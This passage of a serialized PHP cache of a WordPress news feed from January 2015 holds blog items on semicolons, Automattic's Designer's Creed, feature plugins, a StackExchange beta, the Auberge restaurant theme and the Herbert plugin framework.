tomorrow.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 31 Jan 2015 22:50:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Matt: John Scalzi on Semicolons\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44629\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"http://ma.tt/2015/01/john-scalzi-on-semicolons/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:965:\"<blockquote><p>I write novels. And with just about every novel I write, I try to do something new or different that I haven’t done before, in order to challenge myself as a writer, and to keep developing my skills. In The Android’s Dream, of example, I wrote in the third person for the first time; in Zoe’s Tale, I had a main character—a sixteen year old girl—whose life experience was substantially different from my own; with The Human Division, I wrote a novel comprised of thirteen stand-alone “episodes.”</p>\n<p>And now? With Lock In? What new thing have I done to stretch myself as a writer and teller of tales? Well, I’ll tell you; it’s something I’m really proud of, actually:</p>\n<p>I’ve written a novel entirely free of semicolons.</p></blockquote>\n<p>John Scalzi in <a href=\"http://torforgeblog.com/2014/08/04/pacing-doesnt-just-mean-wearing-a-groove-in-the-floor/\">Pacing Doesn’t Just Mean Wearing a Groove in the Floor</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 31 Jan 2015 05:03:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WPTavern: Improvements to the Features as Plugins First Model\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38159\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"http://wptavern.com/improvements-to-the-features-as-plugins-first-model\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4185:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/FeaturePluginModelImprovementFeaturedImage.png\" rel=\"prettyphoto[38159]\"><img class=\"size-full wp-image-38232\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/FeaturePluginModelImprovementFeaturedImage.png?resize=640%2C300\" alt=\"Feature Plugin Improvements\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/terrancedc/9083765513/\">TerranceDC</a> &#8211; <a href=\"http://creativecommons.org/licenses/by-nc/2.0/\">cc</a>\n<p>Earlier this month, I described how the <a title=\"http://wptavern.com/the-features-as-plugins-first-model-is-a-mess\" href=\"http://wptavern.com/the-features-as-plugins-first-model-is-a-mess\">features as plugins first model is a mess</a>. Drew Jaynes, who is <a title=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\" href=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\">leading the development cycle for WordPress 4.2</a>, is already making headway into improving the model. Unlike previous release cycles, feature plugins that are likely to be merged into WordPress have been <a title=\"https://make.wordpress.org/core/2015/01/29/dev-chat-summary-january-28th/\" href=\"https://make.wordpress.org/core/2015/01/29/dev-chat-summary-january-28th/\">assigned a core mentor</a> at the beginning of the cycle. Assigning mentors at the beginning of the dev cycle should help make the merge process smoother and keep each project within scope.</p>\n<h2>Improved Communication</h2>\n<p>One of the biggest issues I have with feature plugins is the lack of communication regarding their progress on the <a title=\"https://make.wordpress.org/core/\" href=\"https://make.wordpress.org/core/\">Make Core</a> blog. This issue is being addressed with weekly updates that explain what&#8217;s changed, things to test, and where focus is needed. The following plugins are candidates that may be included in 4.2:</p>\n<ul>\n<li><a title=\"https://wordpress.org/plugins/press-this/\" href=\"https://wordpress.org/plugins/press-this/\">Press This</a> &#8211; Uses the <a title=\"https://make.wordpress.org/core/tag/press-this/\" href=\"https://make.wordpress.org/core/tag/press-this/\">Press This tag</a> on the Make Core blog.</li>\n<li><a title=\"https://wordpress.org/plugins/customizer-theme-switcher/\" href=\"https://wordpress.org/plugins/customizer-theme-switcher/\">Customizer Theme Switcher</a> &#8211; Uses the <a title=\"https://make.wordpress.org/core/tag/customizer-theme-switcher/\" href=\"https://make.wordpress.org/core/tag/customizer-theme-switcher/\">Customer Theme Switcher</a> tag on the Make Core blog.</li>\n</ul>\n<h2>Improved Testing Opportunities</h2>\n<p>If you browse to the Add New plugins screen in a development version of WordPress, you&#8217;ll see a Beta Testing tab. The tab provides easy access to feature plugins that are currently in development. My primary gripe with testing feature plugins is that they&#8217;re usually not synched with their Github counterparts where most of the development occurs.</p>\n<p>WordPress core developer, Dion Hulse, <a title=\"https://github.com/dd32/Github-to-WordPress-Plugins-Sync\" href=\"https://github.com/dd32/Github-to-WordPress-Plugins-Sync\">created a script</a> specifically to sync feature plugins on Github to the WordPress plugin directory. This allows feature plugins to have nightly releases which are available from the plugin directory. This small but important change makes it a lot easier to keep up with and upgrade feature plugins.</p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/WP42BetaTestingTab.png\" rel=\"prettyphoto[38159]\"><img class=\"size-full wp-image-38225\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/WP42BetaTestingTab.png?resize=1025%2C382\" alt=\"WordPress 4.2 Feature Plugin Beta Testing Tab\" /></a>WordPress 4.2 Feature Plugin Beta Testing Tab\n<p>It&#8217;s still early in the development cycle, but I&#8217;m impressed with Jaynes organizational abilities. He&#8217;s addressed some of the largest pain points to the feature plugin process. If the changes put the experimental model back on track, future lead developers will have an easier time managing the program.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 23:32:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"WPTavern: StackExchange Community Building Beta Provides a Valuable Resource for Digital Community Managers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38086\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"http://wptavern.com/stackexchange-community-building-beta-provides-a-valuable-resource-for-digital-community-managers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5295:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/plants.jpg\" rel=\"prettyphoto[38086]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/plants.jpg?resize=1025%2C505\" alt=\"plants\" class=\"aligncenter size-full wp-image-38240\" /></a></p>\n<p>Online community building is like gardening. Whether you&#8217;re running an active blog, moderating forums, or managing a social network, you will encounter challenges in maintaining growth. Experienced community builders have a wealth of knowledge to share with those who are new to it, especially when it comes to recognizing and mitigating toxic elements, fertilizing to encourage growth, and responding to community changes.</p>\n<p>Last year, StackExchange opened a <a href=\"http://communitybuilding.stackexchange.com/\" target=\"_blank\">Community Building beta</a> to test the waters for a new Q&amp;A site dedicated to building, administering, managing, and cultivating digital communities. It&#8217;s been in beta for approximately six months and has attracted 877 users with an impressive 100% of questions answered.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/community-building-stackexchange.png\" rel=\"prettyphoto[38086]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/community-building-stackexchange.png?resize=765%2C549\" alt=\"community-building-stackexchange\" class=\"aligncenter size-full wp-image-38214\" /></a></p>\n<p>While the Q&amp;A site is not oriented around WordPress (<a href=\"http://wptavern.com/wordpress-stackexchange-thrives-in-2014-with-17-million-page-views-and-14k-new-questions\" target=\"_blank\">WP Developers have their own thriving Stackexchange</a>), many of the questions and topics relate to issues that WordPress site managers deal with every day:</p>\n<ul>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/965/how-do-you-choose-the-software-that-runs-your-community\" target=\"_blank\">How do you choose the software that runs your community?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/964/cant-watch-24x7-how-do-we-keep-comments-under-control\" target=\"_blank\">Can&#8217;t watch 24&#215;7; how do we keep comments under control?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/840/how-to-handle-a-shill\" target=\"_blank\">How to handle a shill?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/972/forum-war-because-of-a-new-rule-and-a-banned-user\" target=\"_blank\">Forum war because of a new rule and a banned user</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/1009/pitfalls-to-avoid-when-transferring-community-ownership\" target=\"_blank\">Pitfalls to avoid when transferring community ownership?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/986/do-long-term-icebreaker-threads-foster-quality-discussion\" target=\"_blank\">Do long-term “icebreaker” threads foster quality discussion?</a></li>\n<li><a href=\"http://communitybuilding.stackexchange.com/questions/950/how-and-when-do-i-attract-experts-to-a-young-site-that-doesnt-yet-have-much-exp\" target=\"_blank\">How and when do I attract experts to a young site that doesn&#8217;t yet have much expert content?</a></li>\n</ul>\n<p>WordPress users have a diverse array of community building software available to them for creating interactive comments, forums, and social networking sites. These plugins make it possible for anyone to build a community, even with very little technical knowledge. However, even with the best tools at your disposal, a community is an organic thing that requires skill and dedication to cultivate.</p>\n<p>New community managers are eager to learn how to chase rabbits and moles out of their gardens while not disrupting community growth, as evidenced by the many questions submitted regarding managing user behavior. The &#8220;<a href=\"http://communitybuilding.stackexchange.com/questions/tagged/problem-users\" target=\"_blank\">problem-users</a>&#8221; tag is so far one of the most popular on the site, followed by other related topics, such as conflict resolution, new users, content curation, forums, and site growth.</p>\n<p>This new Q&amp;A site is still <a href=\"http://area51.stackexchange.com/proposals/52070/moderators\" target=\"_blank\">navigating through its beta period</a> but still needs to demonstrate progress. So far, the beta is healthy in terms of questions getting answered, but it needs to generate more questions on a daily basis, attract more experienced members, and gain more traffic before it can graduate from its final beta.</p>\n<p>Part of the StackExchange mission is to provide answers without distraction for users who are asking practical, detailed questions. The new <a href=\"http://communitybuilding.stackexchange.com/\" target=\"_blank\">Community Building beta</a> site is not a place to vent but rather a place to get solid, actionable advice from experienced community managers. This site is an excellent resource for anyone who is involved in online community building, even if you simply have a blog that receives a steady stream of comments. If you want to contribute, sign up at <a href=\"http://stackexchange.com/\" target=\"_blank\">StackExchange</a> to get started.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 23:11:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Auberge: A Beautiful Free Restaurant Theme for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38161\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"http://wptavern.com/auberge-a-beautiful-free-restaurant-theme-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4671:\"<p>Restaurant themes don&#8217;t often land in the WordPress Themes Directory. In fact, there are barely <a href=\"https://wordpress.org/themes/search.php?q=restaurant\" target=\"_blank\">a dozen</a> listed among the 3,000+ themes on WordPress.org.</p>\n<p>One problem with many commercial restaurant themes is that they are usually marketed as a complete package with everything built into the theme, including menu management. The lack of separation of menu data from the theme means that users are locked into that theme and their content is not transferable.</p>\n<p>That&#8217;s not the case with <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">Auberge</a>, a new free theme from Oliver Juhas of <a href=\"http://www.webmandesign.eu/\" target=\"_blank\">WebMan Design</a>. Last week we featured Juhas&#8217; <a href=\"http://wptavern.com/modern-a-beautiful-free-blog-and-portfolio-theme-for-wordpress\" target=\"_blank\">Modern</a> theme, which was built to showcase portfolios. Modern requires Jetpack for managing portfolio posts, and Auberge takes the same approach for menus.</p>\n<p>The theme&#8217;s home page features a large header image, with blog posts and/or an optional food menu preview displayed beneath.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge.jpg\" rel=\"prettyphoto[38161]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge.jpg?resize=880%2C660\" alt=\"auberge\" class=\"aligncenter size-full wp-image-38163\" /></a></p>\n<p>Check out the <a href=\"http://themedemos.webmandesign.eu/auberge/\" target=\"_blank\">live demo</a> to see how the <a href=\"http://themedemos.webmandesign.eu/auberge/menu/\" target=\"_blank\">menu page</a> is divided into sections. The menus are responsive and each item can be assigned an image, price, and description.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge-menu.jpg\" rel=\"prettyphoto[38161]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/auberge-menu.jpg?resize=1025%2C752\" alt=\"auberge-menu\" class=\"aligncenter size-full wp-image-38183\" /></a></p>\n<p>Auberge requires the <a href=\"https://wordpress.org/plugins/webman-amplifier/\" target=\"_blank\">WebMan Amplifier</a> plugin, available on WordPress.org, in order to extend the theme to include the custom &#8220;ingredients&#8221; taxonomy and recipe metaboxes.  The theme also requires <a href=\"http://jetpack.me/\" target=\"_blank\">Jetpack</a> to support many of the features you see in the demo, including:</p>\n<ul>\n<li>Food menu posts</li>\n<li>Featured content setup (banner area)</li>\n<li>Tiled galleries</li>\n<li>Image lightbox zooming effect</li>\n<li>Infinite Scroll</li>\n<li>Sharing buttons</li>\n<li>Site icon, favicon, and image logo</li>\n<li>Related posts, CDN, etc</li>\n</ul>\n<p>Auberge utilizes WordPress&#8217; native customizer to offer layout options for the placement of the blog posts and food menu sections on the home page. You can also customize the header background and text colors, accent color, footer and widget colors. The customizer also contains options to set the basic font size and select Google Font combinations based on recommendations from the <a href=\"http://femmebot.github.io/google-type/\" target=\"_blank\">Google Web Fonts Typographic Project</a>.</p>\n<p>If you like the layouts seen in the demo site, the theme&#8217;s author has prepared all the markup for each page to copy into your pages. You can find this in the &#8220;Demo Content Page Layouts&#8221; section of the theme&#8217;s <a href=\"http://www.webmandesign.eu/manual/auberge/\" target=\"_blank\">documentation</a>.</p>\n<p>Auberge has support for post formats as well as the unique ability to split posts and pages into <a href=\"http://themedemos.webmandesign.eu/auberge/post-parts/\" target=\"_blank\">multiple parts</a>. It also supports Schema.org markup, Google Recipe View, and Theme Hook Alliance action hooks.</p>\n<p>Auberge was built based on Automattic&#8217;s <a href=\"http://underscores.me/\" target=\"_blank\">Underscores</a> starter theme. Juhas designed it to be lean, so any extra functionality comes in the form of plugins. The theme itself contains no shortcodes, sliders, or page builders.</p>\n<p>If you&#8217;re looking for a restaurant or cafe theme that includes menu content the right way, <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">Auberge</a> is a solid option. It allows you to select a different theme further down the road without losing all of your content. You can find it via your admin themes browser or <a href=\"https://wordpress.org/themes/auberge\" target=\"_blank\">download</a> it directly from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 20:20:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: Designer’s Creed\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44644\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"http://ma.tt/2015/01/designers-creed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1790:\"<p>You might remember a <a href=\"http://ma.tt/2011/09/automattic-creed/\">few years back I talked about why Automattic has a creed, and shared ours</a>. Here it is again:</p>\n<blockquote><p>I will never stop learning. I won&#8217;t just work on things that are assigned to me. I know there&#8217;s no such thing as a status quo. I will build our business sustainably through passionate and loyal customers. I will never pass up an opportunity to help out a colleague, and I&#8217;ll remember the days before I knew everything. I am more motivated by impact than money, and I know that Open Source is one of the most powerful ideas of our generation. I will communicate as much as possible, because it&#8217;s the oxygen of a distributed company. I am in a marathon, not a sprint, and no matter how far away the goal is, the only way to get there is by putting one foot in front of another every day. Given time, there is no problem that&#8217;s insurmountable.</p></blockquote>\n<p>One of the parts of <a href=\"http://automattic.com/\">Automattic</a> that has grown the most over the past few years is our design corps, now over two dozen people. This group, led by creative director <a href=\"http://davemart.in/\">Dave Martin</a>, has come up with a supplemental Designer&#8217;s Creed for followers of their craft at A8C:</p>\n<blockquote><p>I take pride in my craft. I ensure that everyone — regardless of ability or device — can use my designs. I routinely ask for feedback, even when it’s uncomfortable. I regularly watch people use my designs, because testing leads to clarity. I will never stop at “good enough.”</p></blockquote>\n<p><a href=\"http://davemart.in/2015/01/24/the-automattic-designers-creed/\">You can read more about it on Dave&#8217;s blog. »</a></p>\n<p>&nbsp;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 01:15:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"WPTavern: Herbert: A New WordPress Plugin Framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38040\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://wptavern.com/herbert-a-new-wordpress-plugin-framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4069:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/herbert.jpg\" rel=\"prettyphoto[38040]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/herbert.jpg?resize=831%2C405\" alt=\"herbert\" class=\"aligncenter size-full wp-image-38128\" /></a></p>\n<p>WordPress plugin authors have a great deal of liberty when it comes to structuring and organizing their code. There&#8217;s no prescribed file structure, so when you look under the hood of a plugin, you often need to poke around a bit to find out how the author is organizing things.</p>\n<p>Jason Agnew found this to be confusing when he went to build his first WordPress plugin. Agnew is the technical director at <a href=\"http://bigbitecreative.com/\" target=\"_blank\">Big Bite Creative</a>, located in Middlesbrough, England. He often collaborates with both front and back end developers on projects, which drove him to find a better way to write plugins that are organized for multiple team members.</p>\n<p>This week Agnew introduced <a href=\"http://getherbert.com/\" target=\"_blank\">Herbert</a>, a new open source framework for building WordPress plugins. &#8220;We believe the current approach to building plugins is unorganized and difficult to understand,&#8221; Agnew said. &#8220;It makes working in teams or taking over from a previous developer time consuming. Its early days for Herbert but our aim is to solve this.&#8221;</p>\n<p>Prior to creating Herbert with his team, Agnew did his homework to see if there was an existing tool to solve this problem. He discovered the <a href=\"http://wptavern.com/wordpress-plugin-boilerplate-3-0-released-with-new-community-website\" target=\"_blank\">WordPress Plugin Boilerplate</a> project, but determined that it wouldn&#8217;t work for his agency&#8217;s needs. &#8220;Although WPPB would be a great starting point, it seemed best suited to the quick development of smaller plugins,&#8221; Agnew said. &#8220;We needed something more suited to scale.&#8221;</p>\n<p>He checked out some of the most popular WordPress plugins, hoping to find a common thread among them for a semantic, structured method of plugin creation. &#8220;To our surprise, there wasn’t any sense of uniformity or consistency of implementation among them,&#8221; he said. At that point, he rallied his team to write their own WordPress plugin framework.</p>\n<p>The open source <a href=\"http://getherbert.com/\" target=\"_blank\">Herbert</a> project was born out of this effort. The framework aims to keep business logic separate from template code, so that back and frontend developers aren&#8217;t tripping over each other. &#8220;It offers a file structure to keep your code organised, with a solution as simple as all your routes belonging in the plugin/routes.php file,&#8221; Agnew said. &#8220;It no longer ties you or your development team to the WordPress Database Object ($wpdb), allowing you to use the power and effectiveness of <a href=\"http://laravel.com/docs/4.2/eloquent\" target=\"_blank\">Laravel’s Eloquent ORM</a> to handle your database queries.&#8221;</p>\n<p>Herbert utilizes Composer to handle the framework&#8217;s dependencies. Template code is stored in <a href=\"http://getherbert.com/dev/views\" target=\"_blank\">views</a>, which uses the <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig</a> PHP templating engine. The framework may not be everyone&#8217;s cup of tea. However, if you like separating your code into routes, views, and controllers, then Herbert may save you some time when spinning up new plugins.</p>\n<p>The Big Bite Creative team plans to maintain the framework and will add plugin examples in the future. &#8220;We plan to introduce an interface to the WordPress post object for Eloquent, along with tests for your code,&#8221; Agnew said. They are also considering adding a WordPress-specific frontend framework to work alongside Herbert. The project is open to contribution, so feel free to fork Herbert on <a href=\"https://github.com/getherbert/herbert/\" target=\"_blank\">GitHub</a> and send code back to the team.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 23:55:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	